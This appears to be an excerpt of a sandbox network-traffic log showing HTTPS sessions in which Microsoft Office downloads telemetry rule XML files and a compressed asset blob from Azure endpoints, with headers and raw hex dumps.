                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Content-Length: 306698
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 7344f907-e01e-0000-2090-286807000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210228Z-16849878b78fssff8btnns3b1400000005wg000000007mc9
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC15800INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                                                                                                                                                                                                Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: a5 38 7d a8 02 c7 0a 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: 8}u&U\h|[T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5Qa
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: 56 c6 75 11 82 12 e0 b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2
                                                                                                                                                                                                                                                                                                                                Data Ascii: Vu,(T$&O7gkD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35Q
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: 15 3e 36 a4 6a 67 7e 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8
                                                                                                                                                                                                                                                                                                                                Data Ascii: >6jg~*B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: e5 2e b7 93 a4 b3 90 c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43
                                                                                                                                                                                                                                                                                                                                Data Ascii: .kp4k@?lk/IyMR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~C
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: df 26 b7 09 e8 f5 8c 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: &{M1eIwyfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: c0 77 d7 f0 0b 75 ef b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: wuO n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: 8f 67 d5 e8 e4 34 eb e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3
                                                                                                                                                                                                                                                                                                                                Data Ascii: g4,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: c8 b1 0e c3 45 a4 cf 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48
                                                                                                                                                                                                                                                                                                                                Data Ascii: E4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vH
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: 94 22 1e 7d b0 6a 95 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25
                                                                                                                                                                                                                                                                                                                                Data Ascii: "}jVG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                49192.168.2.54982213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210228Z-16849878b78fkwcjkpn19c5dsn00000004eg00000000yqun
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                50192.168.2.54982313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210228Z-16849878b78xblwksrnkakc08w00000004qg00000000yunq
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                51192.168.2.54982513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 423
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210228Z-16849878b785dznd7xpawq9gcn00000006z000000000bfeg
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                52192.168.2.54982413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9d552454-801e-0083-275a-26f0ae000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
